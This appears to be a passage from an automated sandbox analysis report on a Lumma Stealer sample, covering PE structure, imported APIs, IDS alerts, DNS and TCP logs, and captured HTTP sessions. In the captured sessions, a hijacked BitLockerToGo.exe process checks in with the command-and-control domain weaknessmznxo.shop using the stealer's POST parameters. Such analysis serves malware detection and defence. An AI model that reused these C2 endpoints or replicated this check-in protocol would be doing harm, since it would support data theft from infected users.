                    .edata0x1d1d0000x4e0x20059894bd46f22467c6fba5998fd9aa86fFalse0.1328125data0.9168902136227094IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                    .idata0x1d1e0000x14ec0x160073543fe492ba694c6f4066e63bf8da45False0.30806107954545453data4.700054913582164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .CRT0x1d200000x700x200bed1e4dbcc01ac022356d6b461c3f56eFalse0.083984375data0.47677526113352753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .tls0x1d210000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x1d220000x114480x1160013451d56f69335207963c534009b9414False0.09012477517985612data2.138503865964636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc0x1d340000x41d640x41e00db564ee9c3296a685f774d73bc956b61False0.1475072639943074data5.443108273898175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0x1d221300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 15118 x 15118 px/m0.0769105642966994
                    RT_GROUP_ICON0x1d329580x14data1.15
                    RT_VERSION0x1d3296c0x4f4dataEnglishUnited States0.2752365930599369
                    RT_MANIFEST0x1d32e600x5e8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4252645502645503
                    DLLImport
                    KERNEL32.dllAddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
                    msvcrt.dll___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _assert, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, clock, exit, fflush, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcmp, memcpy, memmove, memset, printf, qsort, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen
                    NameOrdinalAddress
                    _cgo_dummy_export10x141d1b750
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                    2024-07-26T20:34:17.067725+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49738443192.168.2.4172.67.159.243
                    2024-07-26T20:34:04.320473+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49731443192.168.2.4172.67.159.243
                    2024-07-26T20:34:42.629750+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436139740.127.169.103192.168.2.4
                    2024-07-26T20:34:06.971675+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49733443192.168.2.4172.67.159.243
                    2024-07-26T20:34:08.122528+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49734443192.168.2.4172.67.159.243
                    2024-07-26T20:34:41.323239+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436139640.127.169.103192.168.2.4
                    2024-07-26T20:34:19.147395+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973920.114.59.183192.168.2.4
                    2024-07-26T20:34:05.636459+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49732443192.168.2.4172.67.159.243
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 26, 2024 20:34:03.323817015 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:03.323862076 CEST44349731172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:03.323930979 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:03.327691078 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:03.327728987 CEST44349731172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:03.834666014 CEST44349731172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:03.834777117 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:03.839355946 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:03.839382887 CEST44349731172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:03.839797974 CEST44349731172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:03.892023087 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:03.909229994 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:03.909265995 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:03.909621954 CEST44349731172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:04.320455074 CEST44349731172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:04.320728064 CEST44349731172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:04.320811987 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:04.323342085 CEST49731443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:04.323384047 CEST44349731172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:04.334774971 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:04.334863901 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:04.334969997 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:04.335258961 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:04.335289955 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:04.945640087 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:04.945806026 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:04.946902037 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:04.946930885 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:04.947434902 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:04.949016094 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:04.949059963 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:04.949125051 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.636564970 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.636681080 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.636784077 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.636823893 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.640860081 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.640959024 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.640995026 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.644839048 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.644911051 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.644921064 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.644952059 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.645009995 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.647774935 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.650540113 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.650609016 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.650619030 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.650641918 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.650703907 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.653126001 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.704643965 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.724703074 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.725303888 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.725526094 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.725526094 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.726139069 CEST49732443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.726178885 CEST44349732172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.858578920 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.858619928 CEST44349733172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:05.858731985 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.859025002 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:05.859041929 CEST44349733172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:06.363713026 CEST44349733172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:06.363817930 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:06.365103960 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:06.365118980 CEST44349733172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:06.365359068 CEST44349733172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:06.366471052 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:06.366745949 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:06.366769075 CEST44349733172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:06.366825104 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:06.366833925 CEST44349733172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:06.971777916 CEST44349733172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:06.972028017 CEST44349733172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:06.972033024 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:06.972076893 CEST49733443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:07.083393097 CEST49734443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:07.083455086 CEST44349734172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:07.083574057 CEST49734443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:07.083880901 CEST49734443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:07.083899975 CEST44349734172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:07.542944908 CEST44349734172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:07.543077946 CEST49734443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:07.544411898 CEST49734443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:07.544426918 CEST44349734172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:07.544636965 CEST44349734172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:07.545943022 CEST49734443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:07.546065092 CEST49734443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:07.546092033 CEST44349734172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.122605085 CEST44349734172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.122831106 CEST44349734172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.122936010 CEST49734443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.122999907 CEST49734443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.123023987 CEST44349734172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.362942934 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.362991095 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.363070965 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.363365889 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.363380909 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.985053062 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.985249043 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.987042904 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.987067938 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.987296104 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.988446951 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.988578081 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.988617897 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:08.988708973 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:08.988725901 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:09.932116985 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:09.932390928 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:09.932450056 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:09.932562113 CEST49735443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:09.932602882 CEST44349735172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:10.466413021 CEST49736443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:10.466491938 CEST44349736172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:10.466590881 CEST49736443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:10.466902018 CEST49736443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:10.466932058 CEST44349736172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:10.974263906 CEST44349736172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:10.974432945 CEST49736443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:10.975943089 CEST49736443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:10.975970030 CEST44349736172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:10.976246119 CEST44349736172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:10.977597952 CEST49736443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:10.977699041 CEST49736443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:10.977710962 CEST44349736172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:11.642441988 CEST44349736172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:11.642524958 CEST44349736172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:11.642715931 CEST49736443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:11.645085096 CEST49736443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:11.645136118 CEST44349736172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.141426086 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.141506910 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.141623974 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.141952991 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.141973019 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.625968933 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.626080990 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.627424955 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.627433062 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.627628088 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.629769087 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.630450964 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.630480051 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.630589008 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.630620003 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.631710052 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.631746054 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.631899118 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.631927967 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.632155895 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.632188082 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.632373095 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.632400036 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.632406950 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.632419109 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.632555962 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.632575035 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.632589102 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.632766008 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.632786036 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.641138077 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.641330957 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.641372919 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:12.641406059 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.641458035 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.641490936 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:12.646222115 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:15.742036104 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:15.742280960 CEST44349737172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:15.742305994 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:15.742340088 CEST49737443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:15.778130054 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:15.778161049 CEST44349738172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:15.778247118 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:15.778537035 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:15.778553009 CEST44349738172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:16.324687958 CEST44349738172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:16.324778080 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:16.326420069 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:16.326456070 CEST44349738172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:16.326776981 CEST44349738172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:16.328130960 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:16.328150034 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:16.328191042 CEST44349738172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:17.067815065 CEST44349738172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:17.068042994 CEST44349738172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:17.068140030 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:17.068319082 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:17.068337917 CEST44349738172.67.159.243192.168.2.4
                    Jul 26, 2024 20:34:17.068367004 CEST49738443192.168.2.4172.67.159.243
                    Jul 26, 2024 20:34:17.068372011 CEST44349738172.67.159.243192.168.2.4
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 26, 2024 20:34:03.300448895 CEST5256853192.168.2.41.1.1.1
                    Jul 26, 2024 20:34:03.317682981 CEST53525681.1.1.1192.168.2.4
                    Jul 26, 2024 20:34:36.243988991 CEST5365246162.159.36.2192.168.2.4
                    Jul 26, 2024 20:34:36.743046045 CEST5548653192.168.2.41.1.1.1
                    Jul 26, 2024 20:34:36.751231909 CEST53554861.1.1.1192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 26, 2024 20:34:03.300448895 CEST192.168.2.41.1.1.10x1d29Standard query (0)weaknessmznxo.shopA (IP address)IN (0x0001)false
                    Jul 26, 2024 20:34:36.743046045 CEST192.168.2.41.1.1.10x6bb1Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 26, 2024 20:34:03.317682981 CEST1.1.1.1192.168.2.40x1d29No error (0)weaknessmznxo.shop172.67.159.243A (IP address)IN (0x0001)false
                    Jul 26, 2024 20:34:03.317682981 CEST1.1.1.1192.168.2.40x1d29No error (0)weaknessmznxo.shop104.21.41.43A (IP address)IN (0x0001)false
                    Jul 26, 2024 20:34:36.751231909 CEST1.1.1.1192.168.2.40x6bb1Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                    • weaknessmznxo.shop
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449731172.67.159.2434437056C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    TimestampBytes transferredDirectionData
                    2024-07-26 18:34:03 UTC265OUTPOST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: weaknessmznxo.shop
                    2024-07-26 18:34:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                    Data Ascii: act=life
                    2024-07-26 18:34:04 UTC808INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 18:34:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Set-Cookie: PHPSESSID=jb605ih35as0gg9u4g9midshm1; expires=Tue, 19-Nov-2024 12:20:43 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOWBDzqTIya8AbHYOK0Qq8qr%2BELKrax4IG8PGYPZUyA5lSFORrEkzq24i6Yc5C8JJNCAixDf7pYzHxk0vUZVescWAdmH%2FyZ65DOrig%2Bb9aROSHJ9qOVOb7AKj2K%2F3q%2B6P5%2BpVH4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a967b4ebb521839-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-26 18:34:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                    Data Ascii: 2ok
                    2024-07-26 18:34:04 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449732172.67.159.2434437056C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    TimestampBytes transferredDirectionData
                    2024-07-26 18:34:04 UTC266OUTPOST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 52
                    Host: weaknessmznxo.shop
                    2024-07-26 18:34:04 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e 61 75 73 67 62 26 6a 3d
                    Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@kolnausgb&j=
                    2024-07-26 18:34:05 UTC802INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 18:34:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
